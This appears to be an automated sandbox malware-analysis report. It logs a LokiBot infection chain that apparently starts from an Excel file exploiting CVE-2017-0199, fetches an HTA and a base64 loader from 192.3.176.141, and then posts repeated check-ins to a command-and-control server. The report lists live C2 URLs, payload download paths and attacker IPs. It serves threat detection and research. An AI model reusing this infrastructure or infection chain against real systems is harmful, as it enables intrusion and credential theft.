Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49211
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49208
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.176.141:80 -> 192.168.2.22:49175
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.161:443 -> 192.168.2.22:49174

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.220/simple/five/fre.php

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/SMPLRTT.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 192.3.176.141 192.3.176.141
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.141:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.176.141:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 192.3.176.141:80

Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "33147-625456f86fad3"
Source: global traffic	HTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "33147-625456f86fad3"
Source: global traffic	HTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE89A04B18 URLDownloadToFileW,

5_2_000007FE89A04B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D35A1E0C.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "33147-625456f86fad3"
Source: global traffic	HTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMTConnection: Keep-AliveHost: 192.3.176.141If-None-Match: "33147-625456f86fad3"
Source: global traffic	HTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /41/SMPLRTT.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: qrisni.me
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: unknown

